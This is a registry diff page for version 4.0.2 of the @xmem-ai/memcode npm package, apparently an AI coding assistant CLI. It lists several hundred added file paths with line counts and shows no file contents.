@xmem-ai/memcode 4.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2066) hide show
  1. package/LICENSE +21 -0
  2. package/README.md +96 -0
  3. package/bin/memcode.js +145 -0
  4. package/dist/QueryEngine.js +905 -0
  5. package/dist/Task.js +46 -0
  6. package/dist/Tool.js +42 -0
  7. package/dist/assistant/gate.js +6 -0
  8. package/dist/assistant/index.js +21 -0
  9. package/dist/assistant/sessionDiscovery.js +6 -0
  10. package/dist/assistant/sessionHistory.js +45 -0
  11. package/dist/bootstrap/state.js +1252 -0
  12. package/dist/bridge/bridgeApi.js +368 -0
  13. package/dist/bridge/bridgeConfig.js +47 -0
  14. package/dist/bridge/bridgeDebug.js +73 -0
  15. package/dist/bridge/bridgeEnabled.js +99 -0
  16. package/dist/bridge/bridgeMain.js +2018 -0
  17. package/dist/bridge/bridgeMessaging.js +272 -0
  18. package/dist/bridge/bridgePermissionCallbacks.js +7 -0
  19. package/dist/bridge/bridgePointer.js +120 -0
  20. package/dist/bridge/bridgeStatusUtil.js +95 -0
  21. package/dist/bridge/bridgeUI.js +388 -0
  22. package/dist/bridge/capacityWake.js +30 -0
  23. package/dist/bridge/codeSessionApi.js +107 -0
  24. package/dist/bridge/createSession.js +266 -0
  25. package/dist/bridge/debugUtils.js +91 -0
  26. package/dist/bridge/envLessBridgeConfig.js +85 -0
  27. package/dist/bridge/flushGate.js +52 -0
  28. package/dist/bridge/inboundAttachments.js +109 -0
  29. package/dist/bridge/inboundMessages.js +36 -0
  30. package/dist/bridge/initReplBridge.js +322 -0
  31. package/dist/bridge/jwtUtils.js +163 -0
  32. package/dist/bridge/pollConfig.js +58 -0
  33. package/dist/bridge/pollConfigDefaults.js +33 -0
  34. package/dist/bridge/remoteBridgeCore.js +645 -0
  35. package/dist/bridge/remotePairing.js +49 -0
  36. package/dist/bridge/replBridge.js +1336 -0
  37. package/dist/bridge/replBridgeHandle.js +20 -0
  38. package/dist/bridge/replBridgeTransport.js +179 -0
  39. package/dist/bridge/sessionIdCompat.js +18 -0
  40. package/dist/bridge/sessionRunner.js +398 -0
  41. package/dist/bridge/trustedDevice.js +144 -0
  42. package/dist/bridge/types.js +10 -0
  43. package/dist/bridge/webhookSanitizer.js +6 -0
  44. package/dist/bridge/workSecret.js +67 -0
  45. package/dist/buddy/CompanionSprite.js +341 -0
  46. package/dist/buddy/companion.js +106 -0
  47. package/dist/buddy/observer.js +52 -0
  48. package/dist/buddy/prompt.js +29 -0
  49. package/dist/buddy/sprites.js +506 -0
  50. package/dist/buddy/types.js +131 -0
  51. package/dist/buddy/useBuddyNotification.js +87 -0
  52. package/dist/bun-bundle-shim.js +10 -0
  53. package/dist/cli/exit.js +14 -0
  54. package/dist/cli/handlers/agents.js +56 -0
  55. package/dist/cli/handlers/auth.js +263 -0
  56. package/dist/cli/handlers/autoMode.js +106 -0
  57. package/dist/cli/handlers/mcp.js +301 -0
  58. package/dist/cli/handlers/plugins.js +599 -0
  59. package/dist/cli/handlers/util.js +121 -0
  60. package/dist/cli/ndjsonSafeStringify.js +14 -0
  61. package/dist/cli/print.js +3810 -0
  62. package/dist/cli/remoteIO.js +184 -0
  63. package/dist/cli/structuredIO.js +613 -0
  64. package/dist/cli/transports/HybridTransport.js +193 -0
  65. package/dist/cli/transports/SSETransport.js +491 -0
  66. package/dist/cli/transports/SerialBatchEventUploader.js +191 -0
  67. package/dist/cli/transports/WebSocketTransport.js +584 -0
  68. package/dist/cli/transports/WorkerStateUploader.js +75 -0
  69. package/dist/cli/transports/ccrClient.js +711 -0
  70. package/dist/cli/transports/transportUtils.js +28 -0
  71. package/dist/cli/update.js +325 -0
  72. package/dist/commands/add-dir/add-dir.js +121 -0
  73. package/dist/commands/add-dir/index.js +11 -0
  74. package/dist/commands/add-dir/validation.js +71 -0
  75. package/dist/commands/advisor.js +98 -0
  76. package/dist/commands/agents/agents.js +12 -0
  77. package/dist/commands/agents/index.js +10 -0
  78. package/dist/commands/ant-trace/index.js +1 -0
  79. package/dist/commands/apikey/apikey.js +139 -0
  80. package/dist/commands/apikey/index.js +33 -0
  81. package/dist/commands/assistant-room/assistantRoom.js +15 -0
  82. package/dist/commands/assistant-room/index.js +12 -0
  83. package/dist/commands/autofix-pr/index.js +1 -0
  84. package/dist/commands/backfill-sessions/index.js +1 -0
  85. package/dist/commands/background/background.js +17 -0
  86. package/dist/commands/background/index.js +12 -0
  87. package/dist/commands/branch/branch.js +183 -0
  88. package/dist/commands/branch/index.js +14 -0
  89. package/dist/commands/break-cache/index.js +1 -0
  90. package/dist/commands/bridge/bridge.js +487 -0
  91. package/dist/commands/bridge/index.js +27 -0
  92. package/dist/commands/bridge/preflight.js +30 -0
  93. package/dist/commands/bridge-kick.js +148 -0
  94. package/dist/commands/brief.js +79 -0
  95. package/dist/commands/btw/btw.js +235 -0
  96. package/dist/commands/btw/index.js +12 -0
  97. package/dist/commands/buddy/buddy.js +136 -0
  98. package/dist/commands/buddy/index.js +40 -0
  99. package/dist/commands/bughunter/index.js +1 -0
  100. package/dist/commands/chrome/chrome.js +317 -0
  101. package/dist/commands/chrome/index.js +14 -0
  102. package/dist/commands/clear/caches.js +84 -0
  103. package/dist/commands/clear/clear.js +8 -0
  104. package/dist/commands/clear/conversation.js +175 -0
  105. package/dist/commands/clear/index.js +13 -0
  106. package/dist/commands/color/color.js +66 -0
  107. package/dist/commands/color/index.js +12 -0
  108. package/dist/commands/commit-push-pr.js +151 -0
  109. package/dist/commands/commit.js +90 -0
  110. package/dist/commands/compact/compact.js +204 -0
  111. package/dist/commands/compact/index.js +14 -0
  112. package/dist/commands/config/config.js +8 -0
  113. package/dist/commands/config/index.js +11 -0
  114. package/dist/commands/context/context-noninteractive.js +308 -0
  115. package/dist/commands/context/context.js +53 -0
  116. package/dist/commands/context/index.js +25 -0
  117. package/dist/commands/copy/copy.js +356 -0
  118. package/dist/commands/copy/index.js +10 -0
  119. package/dist/commands/cost/cost.js +93 -0
  120. package/dist/commands/cost/index.js +19 -0
  121. package/dist/commands/createMovedToPluginCommand.js +44 -0
  122. package/dist/commands/credits/credits.js +246 -0
  123. package/dist/commands/credits/index.js +11 -0
  124. package/dist/commands/ctx_viz/index.js +1 -0
  125. package/dist/commands/debug-tool-call/index.js +1 -0
  126. package/dist/commands/desktop/desktop.js +8 -0
  127. package/dist/commands/desktop/index.js +25 -0
  128. package/dist/commands/diff/diff.js +10 -0
  129. package/dist/commands/diff/index.js +9 -0
  130. package/dist/commands/doctor/doctor.js +8 -0
  131. package/dist/commands/doctor/index.js +12 -0
  132. package/dist/commands/effort/effort.js +250 -0
  133. package/dist/commands/effort/index.js +15 -0
  134. package/dist/commands/env/index.js +1 -0
  135. package/dist/commands/exit/exit.js +37 -0
  136. package/dist/commands/exit/index.js +12 -0
  137. package/dist/commands/export/export.js +79 -0
  138. package/dist/commands/export/index.js +11 -0
  139. package/dist/commands/extra-usage/extra-usage-core.js +91 -0
  140. package/dist/commands/extra-usage/extra-usage-noninteractive.js +14 -0
  141. package/dist/commands/extra-usage/extra-usage.js +17 -0
  142. package/dist/commands/extra-usage/index.js +37 -0
  143. package/dist/commands/fast/fast.js +290 -0
  144. package/dist/commands/fast/index.js +26 -0
  145. package/dist/commands/feedback/feedback.js +13 -0
  146. package/dist/commands/feedback/index.js +16 -0
  147. package/dist/commands/files/files.js +15 -0
  148. package/dist/commands/files/index.js +12 -0
  149. package/dist/commands/good-memcode/index.js +1 -0
  150. package/dist/commands/heapdump/heapdump.js +18 -0
  151. package/dist/commands/heapdump/index.js +12 -0
  152. package/dist/commands/help/help.js +33 -0
  153. package/dist/commands/help/index.js +11 -0
  154. package/dist/commands/hooks/hooks.js +14 -0
  155. package/dist/commands/hooks/index.js +11 -0
  156. package/dist/commands/ide/ide.js +607 -0
  157. package/dist/commands/ide/index.js +11 -0
  158. package/dist/commands/init-verifiers.js +262 -0
  159. package/dist/commands/init.js +245 -0
  160. package/dist/commands/insights.js +2262 -0
  161. package/dist/commands/install-github-app/ApiKeyStep.js +244 -0
  162. package/dist/commands/install-github-app/CheckExistingSecretStep.js +208 -0
  163. package/dist/commands/install-github-app/CheckGitHubStep.js +17 -0
  164. package/dist/commands/install-github-app/ChooseRepoStep.js +228 -0
  165. package/dist/commands/install-github-app/CreatingStep.js +68 -0
  166. package/dist/commands/install-github-app/ErrorStep.js +107 -0
  167. package/dist/commands/install-github-app/ExistingWorkflowStep.js +123 -0
  168. package/dist/commands/install-github-app/InstallAppStep.js +114 -0
  169. package/dist/commands/install-github-app/OAuthFlowStep.js +222 -0
  170. package/dist/commands/install-github-app/SuccessStep.js +117 -0
  171. package/dist/commands/install-github-app/WarningsStep.js +92 -0
  172. package/dist/commands/install-github-app/index.js +14 -0
  173. package/dist/commands/install-github-app/install-github-app.js +551 -0
  174. package/dist/commands/install-github-app/setupGitHubActions.js +246 -0
  175. package/dist/commands/install-github-app/types.js +0 -0
  176. package/dist/commands/install-slack-app/index.js +14 -0
  177. package/dist/commands/install-slack-app/install-slack-app.js +26 -0
  178. package/dist/commands/install.js +241 -0
  179. package/dist/commands/issue/index.js +1 -0
  180. package/dist/commands/keybindings/index.js +13 -0
  181. package/dist/commands/keybindings/keybindings.js +46 -0
  182. package/dist/commands/login/index.js +11 -0
  183. package/dist/commands/login/login.js +59 -0
  184. package/dist/commands/logout/index.js +11 -0
  185. package/dist/commands/logout/logout.js +71 -0
  186. package/dist/commands/mcp/addCommand.js +199 -0
  187. package/dist/commands/mcp/index.js +24 -0
  188. package/dist/commands/mcp/mcp.js +80 -0
  189. package/dist/commands/mcp/xaaIdpCommand.js +176 -0
  190. package/dist/commands/memory/index.js +10 -0
  191. package/dist/commands/memory/memory.js +75 -0
  192. package/dist/commands/mobile/index.js +12 -0
  193. package/dist/commands/mobile/localMobileServer.js +260 -0
  194. package/dist/commands/mobile/memcodeRelay.js +188 -0
  195. package/dist/commands/mobile/mobile.js +88 -0
  196. package/dist/commands/mock-limits/index.js +1 -0
  197. package/dist/commands/mode/index.js +11 -0
  198. package/dist/commands/mode/mode.js +88 -0
  199. package/dist/commands/model/index.js +14 -0
  200. package/dist/commands/model/model.js +279 -0
  201. package/dist/commands/oauth-refresh/index.js +1 -0
  202. package/dist/commands/onboarding/index.js +1 -0
  203. package/dist/commands/output-style/index.js +11 -0
  204. package/dist/commands/output-style/output-style.js +8 -0
  205. package/dist/commands/passes/index.js +28 -0
  206. package/dist/commands/passes/passes.js +24 -0
  207. package/dist/commands/perf-issue/index.js +1 -0
  208. package/dist/commands/permissions/index.js +11 -0
  209. package/dist/commands/permissions/permissions.js +11 -0
  210. package/dist/commands/plan/index.js +11 -0
  211. package/dist/commands/plan/plan.js +123 -0
  212. package/dist/commands/plugin/AddMarketplace.js +126 -0
  213. package/dist/commands/plugin/BrowseMarketplace.js +658 -0
  214. package/dist/commands/plugin/DiscoverPlugins.js +685 -0
  215. package/dist/commands/plugin/ManageMarketplaces.js +695 -0
  216. package/dist/commands/plugin/ManagePlugins.js +1728 -0
  217. package/dist/commands/plugin/PluginErrors.js +122 -0
  218. package/dist/commands/plugin/PluginOptionsDialog.js +361 -0
  219. package/dist/commands/plugin/PluginOptionsFlow.js +78 -0
  220. package/dist/commands/plugin/PluginSettings.js +1066 -0
  221. package/dist/commands/plugin/PluginTrustWarning.js +43 -0
  222. package/dist/commands/plugin/UnifiedInstalledCell.js +640 -0
  223. package/dist/commands/plugin/ValidatePlugin.js +107 -0
  224. package/dist/commands/plugin/index.js +12 -0
  225. package/dist/commands/plugin/parseArgs.js +64 -0
  226. package/dist/commands/plugin/plugin.js +8 -0
  227. package/dist/commands/plugin/pluginDetailsHelpers.js +89 -0
  228. package/dist/commands/plugin/usePagination.js +94 -0
  229. package/dist/commands/pr_comments/index.js +52 -0
  230. package/dist/commands/privacy-settings/index.js +15 -0
  231. package/dist/commands/privacy-settings/privacy-settings.js +53 -0
  232. package/dist/commands/rate-limit-options/index.js +23 -0
  233. package/dist/commands/rate-limit-options/rate-limit-options.js +204 -0
  234. package/dist/commands/release-notes/index.js +11 -0
  235. package/dist/commands/release-notes/release-notes.js +39 -0
  236. package/dist/commands/reload-plugins/index.js +14 -0
  237. package/dist/commands/reload-plugins/reload-plugins.js +39 -0
  238. package/dist/commands/remote-env/index.js +16 -0
  239. package/dist/commands/remote-env/remote-env.js +8 -0
  240. package/dist/commands/remote-setup/api.js +138 -0
  241. package/dist/commands/remote-setup/index.js +16 -0
  242. package/dist/commands/remote-setup/remote-setup.js +153 -0
  243. package/dist/commands/rename/generateSessionName.js +54 -0
  244. package/dist/commands/rename/index.js +12 -0
  245. package/dist/commands/rename/rename.js +67 -0
  246. package/dist/commands/reset-limits/index.js +4 -0
  247. package/dist/commands/resume/index.js +12 -0
  248. package/dist/commands/resume/resume.js +242 -0
  249. package/dist/commands/review/UltrareviewOverageDialog.js +98 -0
  250. package/dist/commands/review/reviewRemote.js +211 -0
  251. package/dist/commands/review/ultrareviewCommand.js +47 -0
  252. package/dist/commands/review/ultrareviewEnabled.js +8 -0
  253. package/dist/commands/review.js +48 -0
  254. package/dist/commands/rewind/index.js +13 -0
  255. package/dist/commands/rewind/rewind.js +9 -0
  256. package/dist/commands/sandbox-toggle/index.js +45 -0
  257. package/dist/commands/sandbox-toggle/sandbox-toggle.js +61 -0
  258. package/dist/commands/security-review.js +237 -0
  259. package/dist/commands/session/index.js +16 -0
  260. package/dist/commands/session/session.js +149 -0
  261. package/dist/commands/share/index.js +1 -0
  262. package/dist/commands/skills/index.js +11 -0
  263. package/dist/commands/skills/skills.js +8 -0
  264. package/dist/commands/stats/index.js +10 -0
  265. package/dist/commands/stats/stats.js +8 -0
  266. package/dist/commands/status/index.js +11 -0
  267. package/dist/commands/status/status.js +8 -0
  268. package/dist/commands/statusline.js +24 -0
  269. package/dist/commands/stickers/index.js +11 -0
  270. package/dist/commands/stickers/stickers.js +16 -0
  271. package/dist/commands/summary/index.js +1 -0
  272. package/dist/commands/tag/index.js +12 -0
  273. package/dist/commands/tag/tag.js +218 -0
  274. package/dist/commands/tasks/index.js +11 -0
  275. package/dist/commands/tasks/tasks.js +8 -0
  276. package/dist/commands/teleport/index.js +1 -0
  277. package/dist/commands/terminalSetup/index.js +18 -0
  278. package/dist/commands/terminalSetup/terminalSetup.js +423 -0
  279. package/dist/commands/theme/index.js +10 -0
  280. package/dist/commands/theme/theme.js +52 -0
  281. package/dist/commands/thinkback/index.js +12 -0
  282. package/dist/commands/thinkback/thinkback.js +516 -0
  283. package/dist/commands/thinkback-play/index.js +14 -0
  284. package/dist/commands/thinkback-play/thinkback-play.js +34 -0
  285. package/dist/commands/ultraplan.js +365 -0
  286. package/dist/commands/upgrade/index.js +13 -0
  287. package/dist/commands/upgrade/upgrade.js +37 -0
  288. package/dist/commands/usage/index.js +9 -0
  289. package/dist/commands/usage/usage.js +8 -0
  290. package/dist/commands/version.js +18 -0
  291. package/dist/commands/vim/index.js +11 -0
  292. package/dist/commands/vim/vim.js +27 -0
  293. package/dist/commands/voice/index.js +18 -0
  294. package/dist/commands/voice/voice.js +126 -0
  295. package/dist/commands/xingest/index.js +11 -0
  296. package/dist/commands/xingest/xingest.js +105 -0
  297. package/dist/commands/xmem/index.js +11 -0
  298. package/dist/commands/xmem/xmem.js +65 -0
  299. package/dist/commands/xsearch/index.js +11 -0
  300. package/dist/commands/xsearch/xsearch.js +76 -0
  301. package/dist/commands.js +936 -0
  302. package/dist/components/AgentProgressLine.js +158 -0
  303. package/dist/components/AntModelSwitchCallout.js +6 -0
  304. package/dist/components/App.js +46 -0
  305. package/dist/components/ApproveApiKey.js +133 -0
  306. package/dist/components/AutoModeOptInDialog.js +141 -0
  307. package/dist/components/AutoUpdater.js +154 -0
  308. package/dist/components/AutoUpdaterWrapper.js +85 -0
  309. package/dist/components/AwsAuthStatusBox.js +93 -0
  310. package/dist/components/BaseTextInput.js +139 -0
  311. package/dist/components/BashModeProgress.js +55 -0
  312. package/dist/components/BridgeDialog.js +423 -0
  313. package/dist/components/BypassPermissionsModeDialog.js +96 -0
  314. package/dist/components/ChannelDowngradeDialog.js +102 -0
  315. package/dist/components/ClickableImageRef.js +60 -0
  316. package/dist/components/CommandSelectModal.js +51 -0
  317. package/dist/components/CompactSummary.js +148 -0
  318. package/dist/components/ConfigurableShortcutHint.js +31 -0
  319. package/dist/components/ConsoleOAuthFlow.js +620 -0
  320. package/dist/components/ContextSuggestions.js +60 -0
  321. package/dist/components/ContextVisualization.js +709 -0
  322. package/dist/components/CoordinatorAgentStatus.js +264 -0
  323. package/dist/components/CostThresholdDialog.js +55 -0
  324. package/dist/components/CtrlOToExpand.js +52 -0
  325. package/dist/components/CustomSelect/SelectMulti.js +185 -0
  326. package/dist/components/CustomSelect/index.js +2 -0
  327. package/dist/components/CustomSelect/option-map.js +35 -0
  328. package/dist/components/CustomSelect/select-input-option.js +452 -0
  329. package/dist/components/CustomSelect/select-option.js +33 -0
  330. package/dist/components/CustomSelect/select.js +571 -0
  331. package/dist/components/CustomSelect/use-multi-select-state.js +188 -0
  332. package/dist/components/CustomSelect/use-select-input.js +169 -0
  333. package/dist/components/CustomSelect/use-select-navigation.js +379 -0
  334. package/dist/components/CustomSelect/use-select-state.js +33 -0
  335. package/dist/components/DesktopHandoff.js +200 -0
  336. package/dist/components/DesktopUpsell/DesktopUpsellStartup.js +167 -0
  337. package/dist/components/DevBar.js +52 -0
  338. package/dist/components/DevChannelsDialog.js +111 -0
  339. package/dist/components/DiagnosticsDisplay.js +121 -0
  340. package/dist/components/EffortCallout.js +259 -0
  341. package/dist/components/EffortIndicator.js +33 -0
  342. package/dist/components/ExitFlow.js +45 -0
  343. package/dist/components/ExportDialog.js +113 -0
  344. package/dist/components/FallbackToolUseErrorMessage.js +62 -0
  345. package/dist/components/FallbackToolUseRejectedMessage.js +18 -0
  346. package/dist/components/FastIcon.js +46 -0
  347. package/dist/components/Feedback.js +494 -0
  348. package/dist/components/FeedbackSurvey/FeedbackSurvey.js +177 -0
  349. package/dist/components/FeedbackSurvey/FeedbackSurveyView.js +126 -0
  350. package/dist/components/FeedbackSurvey/TranscriptSharePrompt.js +106 -0
  351. package/dist/components/FeedbackSurvey/submitTranscriptShare.js +81 -0
  352. package/dist/components/FeedbackSurvey/useDebouncedDigitInput.js +56 -0
  353. package/dist/components/FeedbackSurvey/useFeedbackSurvey.js +245 -0
  354. package/dist/components/FeedbackSurvey/useFrustrationDetection.js +6 -0
  355. package/dist/components/FeedbackSurvey/useMemorySurvey.js +190 -0
  356. package/dist/components/FeedbackSurvey/usePostCompactSurvey.js +203 -0
  357. package/dist/components/FeedbackSurvey/useSurveyState.js +84 -0
  358. package/dist/components/FileEditToolDiff.js +164 -0
  359. package/dist/components/FileEditToolUpdatedMessage.js +134 -0
  360. package/dist/components/FileEditToolUseRejectedMessage.js +177 -0
  361. package/dist/components/FilePathLink.js +33 -0
  362. package/dist/components/FullscreenLayout.js +512 -0
  363. package/dist/components/GlobalSearchDialog.js +339 -0
  364. package/dist/components/HelpV2/Commands.js +78 -0
  365. package/dist/components/HelpV2/General.js +31 -0
  366. package/dist/components/HelpV2/HelpV2.js +195 -0
  367. package/dist/components/HighlightedCode/Fallback.js +186 -0
  368. package/dist/components/HighlightedCode.js +189 -0
  369. package/dist/components/HistorySearchDialog.js +105 -0
  370. package/dist/components/IdeAutoConnectDialog.js +156 -0
  371. package/dist/components/IdeOnboardingDialog.js +200 -0
  372. package/dist/components/IdeStatusIndicator.js +63 -0
  373. package/dist/components/IdleReturnDialog.js +117 -0
  374. package/dist/components/InterruptedByUser.js +11 -0
  375. package/dist/components/InvalidConfigDialog.js +143 -0
  376. package/dist/components/InvalidSettingsDialog.js +84 -0
  377. package/dist/components/KeybindingWarnings.js +85 -0
  378. package/dist/components/LanguagePicker.js +91 -0
  379. package/dist/components/LogSelector.js +1561 -0
  380. package/dist/components/LogoV2/AnimatedAsterisk.js +39 -0
  381. package/dist/components/LogoV2/AnimatedXGlyph.js +90 -0
  382. package/dist/components/LogoV2/ChannelsNotice.js +288 -0
  383. package/dist/components/LogoV2/CondensedLogo.js +180 -0
  384. package/dist/components/LogoV2/EmergencyTip.js +42 -0
  385. package/dist/components/LogoV2/Feed.js +112 -0
  386. package/dist/components/LogoV2/FeedColumn.js +60 -0
  387. package/dist/components/LogoV2/GuestPassesUpsell.js +79 -0
  388. package/dist/components/LogoV2/LogoV2.js +47 -0
  389. package/dist/components/LogoV2/Opus1mMergeNotice.js +63 -0
  390. package/dist/components/LogoV2/OverageCreditUpsell.js +141 -0
  391. package/dist/components/LogoV2/VoiceModeNotice.js +73 -0
  392. package/dist/components/LogoV2/WelcomeV2.js +653 -0
  393. package/dist/components/LogoV2/XGlyph.js +59 -0
  394. package/dist/components/LogoV2/feedConfigs.js +92 -0
  395. package/dist/components/LspRecommendation/LspRecommendationMenu.js +78 -0
  396. package/dist/components/MCPServerApprovalDialog.js +114 -0
  397. package/dist/components/MCPServerDesktopImportDialog.js +213 -0
  398. package/dist/components/MCPServerDialogCopy.js +22 -0
  399. package/dist/components/MCPServerMultiselectDialog.js +141 -0
  400. package/dist/components/ManagedSettingsSecurityDialog/ManagedSettingsSecurityDialog.js +161 -0
  401. package/dist/components/ManagedSettingsSecurityDialog/utils.js +81 -0
  402. package/dist/components/Markdown.js +173 -0
  403. package/dist/components/MarkdownTable.js +205 -0
  404. package/dist/components/MemoryUsageIndicator.js +30 -0
  405. package/dist/components/Message.js +485 -0
  406. package/dist/components/MessageModel.js +40 -0
  407. package/dist/components/MessageResponse.js +79 -0
  408. package/dist/components/MessageRow.js +306 -0
  409. package/dist/components/MessageSelector.js +803 -0
  410. package/dist/components/MessageTimestamp.js +60 -0
  411. package/dist/components/Messages.js +501 -0
  412. package/dist/components/ModelPicker.js +487 -0
  413. package/dist/components/NativeAutoUpdater.js +155 -0
  414. package/dist/components/NotebookEditToolUseRejectedMessage.js +100 -0
  415. package/dist/components/OffscreenFreeze.js +22 -0
  416. package/dist/components/Onboarding.js +231 -0
  417. package/dist/components/OutputStylePicker.js +107 -0
  418. package/dist/components/PackageManagerAutoUpdater.js +112 -0
  419. package/dist/components/Passes/Passes.js +147 -0
  420. package/dist/components/PrBadge.js +102 -0
  421. package/dist/components/PressEnterToContinue.js +21 -0
  422. package/dist/components/PromptInput/HistorySearchInput.js +52 -0
  423. package/dist/components/PromptInput/IssueFlagBanner.js +6 -0
  424. package/dist/components/PromptInput/Notifications.js +262 -0
  425. package/dist/components/PromptInput/PromptInput.js +1875 -0
  426. package/dist/components/PromptInput/PromptInputFooter.js +171 -0
  427. package/dist/components/PromptInput/PromptInputFooterLeftSide.js +413 -0
  428. package/dist/components/PromptInput/PromptInputFooterSuggestions.js +144 -0
  429. package/dist/components/PromptInput/PromptInputHelpMenu.js +409 -0
  430. package/dist/components/PromptInput/PromptInputModeIndicator.js +76 -0
  431. package/dist/components/PromptInput/PromptInputQueuedCommands.js +75 -0
  432. package/dist/components/PromptInput/PromptInputStashNotice.js +27 -0
  433. package/dist/components/PromptInput/SandboxPromptFooterHint.js +75 -0
  434. package/dist/components/PromptInput/ShimmeredInput.js +136 -0
  435. package/dist/components/PromptInput/VoiceIndicator.js +152 -0
  436. package/dist/components/PromptInput/inputModes.js +30 -0
  437. package/dist/components/PromptInput/inputPaste.js +53 -0
  438. package/dist/components/PromptInput/useMaybeTruncateInput.js +42 -0
  439. package/dist/components/PromptInput/usePromptInputPlaceholder.js +54 -0
  440. package/dist/components/PromptInput/useShowFastIconHint.js +22 -0
  441. package/dist/components/PromptInput/useSwarmBanner.js +106 -0
  442. package/dist/components/PromptInput/utils.js +30 -0
  443. package/dist/components/QuickOpenDialog.js +243 -0
  444. package/dist/components/RemoteCallout.js +58 -0
  445. package/dist/components/RemoteEnvironmentDialog.js +369 -0
  446. package/dist/components/ResumeTask.js +231 -0
  447. package/dist/components/SandboxViolationExpandedView.js +115 -0
  448. package/dist/components/ScrollKeybindingHandler.js +566 -0
  449. package/dist/components/SearchBox.js +75 -0
  450. package/dist/components/SentryErrorBoundary.js +19 -0
  451. package/dist/components/SessionBackgroundHint.js +74 -0
  452. package/dist/components/SessionPreview.js +209 -0
  453. package/dist/components/Settings/Config.js +1652 -0
  454. package/dist/components/Settings/Settings.js +130 -0
  455. package/dist/components/Settings/Status.js +254 -0
  456. package/dist/components/Settings/Usage.js +379 -0
  457. package/dist/components/ShowInIDEPrompt.js +177 -0
  458. package/dist/components/SkillImprovementSurvey.js +163 -0
  459. package/dist/components/Spinner/FlashingChar.js +57 -0
  460. package/dist/components/Spinner/GlimmerMessage.js +340 -0
  461. package/dist/components/Spinner/ShimmerChar.js +30 -0
  462. package/dist/components/Spinner/SpinnerAnimationRow.js +189 -0
  463. package/dist/components/Spinner/SpinnerGlyph.js +36 -0
  464. package/dist/components/Spinner/SubagentStatusList.js +79 -0
  465. package/dist/components/Spinner/TeammateSpinnerLine.js +183 -0
  466. package/dist/components/Spinner/TeammateSpinnerTree.js +302 -0
  467. package/dist/components/Spinner/index.js +17 -0
  468. package/dist/components/Spinner/teammateSelectHint.js +4 -0
  469. package/dist/components/Spinner/useShimmerAnimation.js +20 -0
  470. package/dist/components/Spinner/useStalledAnimation.js +50 -0
  471. package/dist/components/Spinner/utils.js +72 -0
  472. package/dist/components/Spinner.js +481 -0
  473. package/dist/components/StartupCarousel.js +255 -0
  474. package/dist/components/Stats.js +1130 -0
  475. package/dist/components/StatusLine.js +257 -0
  476. package/dist/components/StatusNotices.js +48 -0
  477. package/dist/components/StructuredDiff/Fallback.js +340 -0
  478. package/dist/components/StructuredDiff/colorDiff.js +27 -0
  479. package/dist/components/StructuredDiff.js +146 -0
  480. package/dist/components/StructuredDiffList.js +17 -0
  481. package/dist/components/TagTabs.js +106 -0
  482. package/dist/components/TaskListV2.js +368 -0
  483. package/dist/components/TeammateViewHeader.js +92 -0
  484. package/dist/components/TeleportError.js +182 -0
  485. package/dist/components/TeleportProgress.js +138 -0
  486. package/dist/components/TeleportRepoMismatchDialog.js +123 -0
  487. package/dist/components/TeleportResumeWrapper.js +174 -0
  488. package/dist/components/TeleportStash.js +108 -0
  489. package/dist/components/TextInput.js +88 -0
  490. package/dist/components/ThemePicker.js +353 -0
  491. package/dist/components/ThinkingToggle.js +152 -0
  492. package/dist/components/TokenWarning.js +170 -0
  493. package/dist/components/ToolUseLoader.js +39 -0
  494. package/dist/components/TrustDialog/TrustDialog.js +307 -0
  495. package/dist/components/TrustDialog/utils.js +160 -0
  496. package/dist/components/UndercoverAutoCallout.js +6 -0
  497. package/dist/components/UsageMeter.js +40 -0
  498. package/dist/components/ValidationErrorsList.js +141 -0
  499. package/dist/components/VimTextInput.js +138 -0
  500. package/dist/components/VirtualMessageList.js +699 -0
  501. package/dist/components/WorkflowMultiselectDialog.js +133 -0
  502. package/dist/components/WorktreeExitDialog.js +210 -0
  503. package/dist/components/XMemExitSummary.js +29 -0
  504. package/dist/components/XMemOAuthFlow.js +296 -0
  505. package/dist/components/XUI.js +57 -0
  506. package/dist/components/agents/AgentDetail.js +282 -0
  507. package/dist/components/agents/AgentEditor.js +161 -0
  508. package/dist/components/agents/AgentNavigationFooter.js +25 -0
  509. package/dist/components/agents/AgentsList.js +498 -0
  510. package/dist/components/agents/AgentsMenu.js +812 -0
  511. package/dist/components/agents/ColorPicker.js +130 -0
  512. package/dist/components/agents/ModelSelector.js +68 -0
  513. package/dist/components/agents/ToolSelector.js +558 -0
  514. package/dist/components/agents/agentFileUtils.js +174 -0
  515. package/dist/components/agents/generateAgent.js +164 -0
  516. package/dist/components/agents/new-agent-creation/CreateAgentWizard.js +90 -0
  517. package/dist/components/agents/new-agent-creation/wizard-steps/ColorStep.js +88 -0
  518. package/dist/components/agents/new-agent-creation/wizard-steps/ConfirmStep.js +437 -0
  519. package/dist/components/agents/new-agent-creation/wizard-steps/ConfirmStepWrapper.js +69 -0
  520. package/dist/components/agents/new-agent-creation/wizard-steps/DescriptionStep.js +134 -0
  521. package/dist/components/agents/new-agent-creation/wizard-steps/GenerateStep.js +125 -0
  522. package/dist/components/agents/new-agent-creation/wizard-steps/LocationStep.js +84 -0
  523. package/dist/components/agents/new-agent-creation/wizard-steps/MemoryStep.js +114 -0
  524. package/dist/components/agents/new-agent-creation/wizard-steps/MethodStep.js +85 -0
  525. package/dist/components/agents/new-agent-creation/wizard-steps/ModelStep.js +57 -0
  526. package/dist/components/agents/new-agent-creation/wizard-steps/PromptStep.js +140 -0
  527. package/dist/components/agents/new-agent-creation/wizard-steps/ToolsStep.js +62 -0
  528. package/dist/components/agents/new-agent-creation/wizard-steps/TypeStep.js +109 -0
  529. package/dist/components/agents/types.js +7 -0
  530. package/dist/components/agents/utils.js +17 -0
  531. package/dist/components/agents/validateAgent.js +78 -0
  532. package/dist/components/assistant-room/AssistantRoom.js +437 -0
  533. package/dist/components/design-system/Byline.js +50 -0
  534. package/dist/components/design-system/Dialog.js +136 -0
  535. package/dist/components/design-system/Divider.js +97 -0
  536. package/dist/components/design-system/FuzzyPicker.js +231 -0
  537. package/dist/components/design-system/KeyboardShortcutHint.js +59 -0
  538. package/dist/components/design-system/ListItem.js +155 -0
  539. package/dist/components/design-system/LoadingState.js +62 -0
  540. package/dist/components/design-system/Pane.js +55 -0
  541. package/dist/components/design-system/ProgressBar.js +66 -0
  542. package/dist/components/design-system/Ratchet.js +79 -0
  543. package/dist/components/design-system/StatusIcon.js +59 -0
  544. package/dist/components/design-system/Tabs.js +297 -0
  545. package/dist/components/design-system/ThemeProvider.js +140 -0
  546. package/dist/components/design-system/ThemedBox.js +115 -0
